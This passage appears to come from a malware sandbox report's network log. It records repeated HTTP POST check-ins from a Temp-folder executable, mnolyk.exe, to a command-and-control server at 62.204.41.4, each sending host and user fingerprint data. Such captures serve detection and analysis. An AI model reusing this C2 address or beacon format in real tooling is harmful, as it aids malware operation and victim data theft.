                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      4 | 192.168.2.7 | 49698 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:02.520210981 CET | 108 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:02.582041979 CET | 108 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      40 | 192.168.2.7 | 49734 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:11.313399076 CET | 144 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:11.377012014 CET | 144 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      400 | 192.168.2.7 | 50095 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:49.744924068 CET | 515 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:49.807482958 CET | 515 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      401 | 192.168.2.7 | 50096 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:49.987227917 CET | 516 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:50.054502964 CET | 516 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      402 | 192.168.2.7 | 50097 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:50.388047934 CET | 517 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:50.452862024 CET | 517 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      403 | 192.168.2.7 | 50098 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:50.686542034 CET | 518 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:50.752957106 CET | 518 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      404 | 192.168.2.7 | 50099 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:50.963557959 CET | 519 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:51.029182911 CET | 519 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      405 | 192.168.2.7 | 50100 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:51.207784891 CET | 520 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:51.273344040 CET | 520 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      406 | 192.168.2.7 | 50101 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:51.475050926 CET | 521 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:51.541920900 CET | 521 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      407 | 192.168.2.7 | 50102 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:51.747853041 CET | 522 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:51.813720942 CET | 522 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      408 | 192.168.2.7 | 50103 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:51.993571043 CET | 523 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:52.057198048 CET | 523 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      409 | 192.168.2.7 | 50104 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:52.249237061 CET | 524 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:52.314605951 CET | 524 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      41 | 192.168.2.7 | 49735 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:11.564677000 CET | 145 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:11.630836010 CET | 145 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      410 | 192.168.2.7 | 50105 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:52.555967093 CET | 525 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:52.620795965 CET | 525 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      411 | 192.168.2.7 | 50106 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:52.814624071 CET | 526 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:52.877818108 CET | 526 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      412 | 192.168.2.7 | 50107 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:53.058284998 CET | 527 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:53.122720003 CET | 527 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      413 | 192.168.2.7 | 50108 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:53.335185051 CET | 528 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:53.401114941 CET | 528 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      414 | 192.168.2.7 | 50109 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:53.586754084 CET | 529 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:53.653393984 CET | 529 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      415 | 192.168.2.7 | 50110 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:53.827948093 CET | 530 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
